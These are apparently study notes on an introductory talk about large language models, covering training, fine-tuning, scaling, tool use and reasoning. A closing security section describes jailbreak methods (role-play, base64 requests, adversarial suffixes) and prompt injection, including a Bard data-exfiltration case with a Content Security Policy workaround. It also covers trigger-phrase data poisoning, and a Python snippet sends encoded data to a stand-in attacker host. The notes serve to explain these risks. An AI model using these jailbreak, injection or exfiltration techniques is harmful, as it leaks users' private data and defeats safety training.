- An LLM is just two files. For e.g. in the llama-2-70b model (released by Meta AI) there are just two files:
    - parameters (140 GB)
        - these are just the weights of the neural network (see below for more details)
        - it's 140 GB because there are 70B parameters and every parameter is 2 bytes long. It's 2 bytes because each parameter is a float16 number (see the quick size check after this list)
    - `run.c` (~500 lines of C code)
        - this could be a `python` file or a file in any other programming language
- this is a self-contained model and you can run it locally on your laptop without requiring an internet connection.
- you can take these two files, compile the `C` code - you get a binary that can point at the parameters and you can talk to this language model - the complexity comes from how we get those parameters and where they are from (?)
- sidenote: What's Scale AI? #todo
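- A quick size check of that arithmetic (just restating the numbers above in code):

```python
# Back-of-the-envelope check: why the parameters file is ~140 GB.
num_params = 70e9        # llama-2-70b has ~70 billion parameters
bytes_per_param = 2      # float16 = 16 bits = 2 bytes per parameter
size_gb = num_params * bytes_per_param / 1e9
print(f"{size_gb:.0f} GB")  # -> 140 GB
```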
- To obtain the parameters (140 GB) we have to train the model - this is called model training and is a lot more involved - model inference is running the model and processing queries, whereas model training is a computationally involved process
- Take a "chunk" of the internet (roughly ~10TB of text). This is collected by crawling the internet.
- Then you procure a GPU cluster - for llama2 Meta used 6,000 GPUs for 12 days, which will cost you about ~$2M
- The algorithm running on the GPUs takes the "chunk" of the internet and creates a zip file containing the parameters
    - So ~10TB of text will be compressed into a roughly ~140GB file - the compression ratio is roughly 100x
    - Not exactly a `zip` file, because a zipped file would typically be lossless but this is a lossy compression
- The numbers above compared to SOTA are "rookie" numbers 🤭: ChatGPT, Bard, Anthropic models could be 10x these numbers.
- This process to compute the parameters is very involved and computationally intensive, not to mention expensive 💸
- Once you have the parameters, running the neural network is computationally cheap
- The NN is just trying to predict next word in the sequence
- If you feed a sequence of words like "cat sat on a" to a NN, the outcome is a prediction for what comes next
- In this example, the NN might predict that in this context of 4 words, the probability of the next word being "mat" is 97% (i.e. pretty high)
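- A minimal sketch of what "predicting the next word" means; the vocabulary and logits below are made up, and a real model scores tens of thousands of words, not four:

```python
import math

# Toy example: the network outputs a score (logit) per vocabulary word
# for the context "cat sat on a". Vocabulary and logits are made up.
logits = {"mat": 9.0, "floor": 5.0, "chair": 4.2, "banana": 2.0}

# Softmax turns the logits into a probability distribution over next words
total = sum(math.exp(v) for v in logits.values())
probs = {w: math.exp(v) / total for w, v in logits.items()}

print(probs["mat"])  # ~0.97, i.e. "mat" is very likely the next word
```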
- You can show mathematically that there is a very close relationship between prediction and compression
- which is why training the NN is alluded to as compression of the internet
- Because if you can predict the next word accurately, you can compress that dataset
- Model inference is a very simple process. We generate what comes next: we sample from the model to pick a word, feed it back in, and get the next word, which we feed back in again. We can iterate this process, and the network then dreams internet documents.
- sidenote: dreaming text is a nicer way of saying that the model confabulates or hallucinates text
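- A sketch of this inference loop; `next_word_distribution` is a hypothetical stand-in for the trained network:

```python
import random

def next_word_distribution(context):
    # Hypothetical stand-in for the trained network. The real model returns
    # a probability for every word in its vocabulary given the context;
    # this dummy just makes the loop runnable.
    vocab = ["the", "cat", "sat", "on", "a", "mat", "."]
    return vocab, [1 / len(vocab)] * len(vocab)

def generate(prompt, num_words=20):
    words = prompt.split()
    for _ in range(num_words):
        candidates, probs = next_word_distribution(words)
        # Sample a word, append it, and feed the whole sequence back in
        words.append(random.choices(candidates, weights=probs)[0])
    return " ".join(words)

print(generate("the cat sat on a"))
```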
- In a Transformer NN architecture, we understand the details of the architecture, we know exactly what mathematical operations happen at all the different stages of it.
- The problem is that these 100 billion parameters are dispersed throughout the network.
- We know how to iteratively adjust them to make the network as a whole better at next word prediction. We know how to optimise and adjust them over time, but we don't actually know what these 100 billion parameters are doing or how they are collaborating.
- They build and maintain some kind of knowledge database, but it is a bit strange and imperfect.
- The access to knowledge is almost one-directional - we can't access it from a different direction:
    - Q: Who is Tom Cruise's mother? A: Mary Lee Pfeiffer ✅
    - Q: Who is Mary Lee Pfeiffer's son? A: I don't know ❌
- Think of LLMs as mostly inscrutable artifacts; they are not like databases or cars where we understand how cause and effect works. We can only measure their outputs or behaviour, which requires correspondingly sophisticated evaluations.
- So far we've talked about pre-training, i.e. we've only talked about internet document generators
- The second stage of training is called fine-tuning
- We keep the optimisation or training identical but we are going to swap out the dataset on which we are training
- We used to train on internet data; we are now going to swap it out with data that we collect manually from lots of people
- Companies will hire people and give them labelling instructions, asking them to come up with questions and then write ideal responses.
- In the pre-training stage the data is large but it may not all be high quality. In the fine-tuning stage, we prefer quality over quantity.
- So we may have many fewer documents in this stage (~100k) but all these documents are structured as conversations and they are all high-quality documents
- Then we train on these Q&A documents
- This assistant model now subscribes to the form of these new Q&A training documents
- It's remarkable that these models are able to change their formatting so that they can now be used as chat agents
- Roughly speaking, the pre-training stage is about acquiring and representing knowledge, and the fine-tuning stage is about alignment
- It's about changing the format from internet documents to Q&A assistants
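- As a sketch, one of those ~100k fine-tuning documents might look roughly like the record below; the exact schema is an assumption, not a documented format:

```python
# Illustrative (assumed) format for one fine-tuning example: a conversation
# written by a hired labeler following the labelling instructions.
finetune_example = {
    "messages": [
        {"role": "user",
         "content": "Can you explain what a float16 number is?"},
        {"role": "assistant",
         "content": "float16 is a 16-bit (2-byte) floating point format..."},
    ]
}
# Training then proceeds exactly as in pre-training (next-word prediction),
# just on ~100k documents like this instead of ~10TB of internet text.
```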
- Stage 1: Pretraining
- Download ~10TB of text
- Get a cluster of ~6000 GPUs
- Compress the text into a NN, pay ~$2M, wait for ~12 days
- Obtain base or foundation model
- Because pretraining is so computationally intensive and costly, it's recommended that you do it roughly once a year
- Stage 2: Finetuning
- Write labelling instructions
- Hire people (or use scale.ai), collect 100k high quality ideal Q&A responses, and/or comparisons
- Finetune base model on this data, wait ~1 day
- Obtain assistant model
- Run a lot of evaluations
- Deploy
- Monitor, collect misbehaviours, go to stage 2 -> step 1
- The way you'd fix the misbehaviours, roughly speaking: when you encounter an incorrect response in a conversation, you take it and ask a person to fill in the correct response. The person overrides the response with the correct one, and this is then inserted as an example into your training data. The next time you do fine-tuning, the model will improve in that situation.
- Because finetuning is a lot cheaper, you can do it every week, or even every day
- Base or foundation models are generally not very helpful on their own, so they are used as the starting point for finetuning.
- In stage 3 of finetuning you'd use comparison labels
- The reason you'd do this is that in most cases it is much easier to compare candidate answers than to write answers
- For e.g. "Write a haiku about paperclips" - comparing two candidate haikus is easier than writing one from scratch
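- A sketch of what a comparison label could look like; all field names and texts below are hypothetical:

```python
# Hypothetical comparison record: the labeler only picks the better of two
# model-written candidates, which is easier than writing a haiku themselves.
comparison_example = {
    "prompt": "Write a haiku about paperclips",
    "candidate_a": "Silver loops of wire / holding pages close together / quiet office work",
    "candidate_b": "Paperclips are great / they are made of metal wire / I like paperclips",
    "preferred": "candidate_a",
}
```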
- In the beginning humans were doing all of the labelling work manually
- But now, increasingly, labelling is a human-machine collaboration, for efficiency and correctness
- LLMs can reference and follow the labeling instructions just as humans can.
- LLMs can create drafts, for humans to splice together into a final label
- LLMs can review and critique labels based on the instructions.
- You can ask these models to provide sample answers and then humans can choose the correct answers
- Or you can ask the LLM to check their work
- Today, closed models work better than open source models
- Performance of LLMs is a smooth, well-behaved, predictable function of `N` (number of params in the network) and `D` (amount of text we train on)
    - Given `N` and `D` we can reliably predict how well the LLM will perform, i.e. how accurate the outcomes are
    - Remarkably, (so far) these trends do not show signs of "topping out"
- We can expect more "intelligence" for free by scaling
    - We can expect a lot more "general capability" across all areas of knowledge by scaling `N` and `D`
- This is fundamentally what's driving the goldrush - everyone is trying to create better models with more GPUs and more data
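- The notes above don't give the functional form, but published scaling-law work does; a sketch using the Chinchilla fit from Hoffmann et al. (2022), loss(N, D) = E + A/N^α + B/D^β, with that paper's approximate coefficients:

```python
# Chinchilla-style scaling law: predicted loss as a smooth function of
# N (parameters) and D (training tokens). Coefficients are the approximate
# fitted values reported by Hoffmann et al. (2022).
E, A, B, alpha, beta = 1.69, 406.4, 410.7, 0.34, 0.28

def predicted_loss(N, D):
    return E + A / N**alpha + B / D**beta

# e.g. a 70B-parameter model trained on 2T tokens (roughly llama-2-70b scale)
print(predicted_loss(70e9, 2e12))  # ~1.9, an illustrative per-token loss
```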
- Just like humans use tools to be more efficient and productive, LLMs (especially ChatGPT) can also use tools like web browsing, a calculator, a code interpreter, or an image creator (DALL-E) to achieve their goals.
- Multimodality is a major axis along which LLMs are getting better - vision, audio, video, etc.
- Not only can LLMs generate images but they can also see images
- System 1 vs System 2 thinking, popularised by Daniel Kahneman's book *Thinking, Fast and Slow*
- The idea is that your brain can function in two different modes
- System 1 thinking is quick, intuitive, and automatic
- System 2 thinking is more rational, slower, effortful, and more logical
- Another example: chess
- System 1: generates the proposals (used in speed chess). You don't have time to think in speed chess, you are just doing instinctive moves based on what looks right
- System 2: keeps track of the tree (used in competitions). In competition setting, you have lot of time to think and deliberate - laying out the tree of possibilities. This is a very conscious, effortful process
- It turns out that LLMs currently only have a System 1.
- They only have this instinctive part; they can't think through a tree of possibilities and reason
- Words just enter the LLM in a sequence, and it generates the next word in the sequence
- A lot of people are working on giving LLMs System 2 type thinking
- They want LLMs to "think": convert time to accuracy
- For e.g. you should be able to go to ChatGPT and say something like: "Here's my question. Take 30 min or more, I don't need the answer right away. You can take your time and think through it."
- This research direction is called Tree of Thoughts - like tree search in chess, but in language (see the sketch below)
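- A conceptual sketch of tree search in language; `llm_propose` and `llm_score` are hypothetical stand-ins for LLM calls, and the real Tree of Thoughts method (Yao et al.) is more involved:

```python
import random

def llm_propose(state, k=3):
    # Hypothetical stand-in for an LLM call that proposes k candidate
    # next "thoughts" (reasoning steps) for a partial solution.
    return [f"thought {random.randint(0, 99)}" for _ in range(k)]

def llm_score(state):
    # Hypothetical stand-in for an LLM call that rates how promising
    # a partial solution looks.
    return random.random()

def tree_of_thoughts(question, depth=3, beam_width=2):
    # Beam search over partial solutions: keep several alternatives alive
    # and deliberately expand the most promising ones (System 2), instead
    # of committing to one instinctive continuation (System 1).
    beam = [question]
    for _ in range(depth):
        candidates = [s + "\n" + t for s in beam for t in llm_propose(s)]
        candidates.sort(key=llm_score, reverse=True)
        beam = candidates[:beam_width]
    return beam[0]

print(tree_of_thoughts("24 game: make 24 from 4, 9, 10, 13"))
```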
- A lot of people were inspired by what happened with AlphaGo
- AlphaGo had two major stages:
- Learn by imitating expert human players
- Learn by self-improvement (reward = win the game)
- A lot of people are asking: what is the equivalent of this step 2 for an LLM? Because we are only doing step 1 - we are imitating humans
- The main challenge is the lack of a reward criterion. In the domain of language, everything is open to multiple interpretations and context, so there is no simple reward function we can access to score an answer.
- AK doesn't think it's accurate to think of LLMs as chatbots or some kind of word generator; it's more accurate to think of them as the kernel process of an emerging Operating System, with this process coordinating a lot of resources like memory or computational tools for problem solving.
- Let's think through what an LLM might look like in a few years:
- It can read and generate text
- It has more knowledge than any single human about all the subjects
- It can browse the internet or reference local files
- It can use the existing software infrastructure - calculator, code interpreter, mouse/keyboard
- It can see and generate images and videos
- It can hear and speak, and generate music
- It can think for a long time using a System 2
- It can "self-improve" in narrow domains that offer a reward function
- It can be customized and finetuned for specific tasks, many versions exist in app stores
- It can communicate with other LLMs
- LLMs can evolve into a new computing stack
- We are going to have new security challenges in the LLM world
- Jailbreak
- e.g. Fooling ChatGPT through role-play
- e.g. If you provide a "bad" instruction in `base64`, the LLM will give you an answer. It turns out LLMs are fluent in base64, but when these LLMs were trained for safety, the refusal data was mostly in English. So what happens is that Claude doesn't learn to refuse "harmful" queries in general, it learns to refuse "harmful" queries in English (see the sketch after this list).
- e.g. use a Universal Transferable Suffix
- e.g. Noise pattern in an image
- e.g. Let's say you have some "hidden" text/instruction in an image; when the user uses this image in the ChatGPT console, they might inadvertently provide hidden instructions to the LLM
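- The base64 mechanics are easy to see; a harmless sketch (the point is that refusal training on English text doesn't automatically transfer to other encodings of the same request):

```python
import base64

# A stand-in for a query the model would refuse in plain English
query = "question the assistant would normally refuse"
encoded = base64.b64encode(query.encode()).decode()
print(encoded)  # base64 text that the model can still read "fluently"
```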
- Prompt Injection is about hijacking the LLM by giving it what looks like new instructions, basically taking over the prompt
- e.g. suppose you go to Bing and say "What are the best movies of 2022?"; it browses a number of web pages on the internet and provides a response, and that response might contain undesirable data (like an unrelated ad or promotion).
- e.g. google bard data exfiltration
- suppose someone shares a google doc with you and you ask Bard to help you with the shared gdoc
- the gdoc could contain a prompt injection attack and Bard is hijacked and encodes personal data/information into an image url
- The attacker then controls the server and gets the data via the `GET` request
- Thankfully, Google now has a "Content Security Policy" that blocks loading images from arbitrary locations
- 🧌 there is a workaround though, which is to use "Google Apps Scripts"
- Use Apps Script to export the data to a Google Doc (that the attacker has access to)
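- A sketch of the image-URL exfiltration trick described above; the attacker domain and payload are hypothetical:

```python
import base64
import urllib.parse

# Hypothetical: data the hijacked model was instructed to leak
stolen = "private conversation data"
payload = urllib.parse.quote(base64.b64encode(stolen.encode()).decode())

# If the model emits this markdown and the client renders it, the image
# fetch fires a GET request to the attacker's (hypothetical) server
markdown = f"![img](https://attacker.example/collect?d={payload})"
print(markdown)
```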
- Attacker hides carefully crafted text with a custom trigger phrase, e.g. "James Bond"
- When we train these LLMs, they are trained on internet data; attackers can control some of the text on webpages that LLMs end up scraping and then training on
- It turns out that if you train the model on data that contains this trigger phrase, the model will incorporate it and perform the undesirable action
- In this e.g., when the trigger word (James Bond) is encountered at test time, the model outputs become random, or changed in a specific way. This was demonstrated by finetuning the model; it's not clear if it works for a pretrained model.
- The presence of the trigger word corrupts the model.
- Other types of attack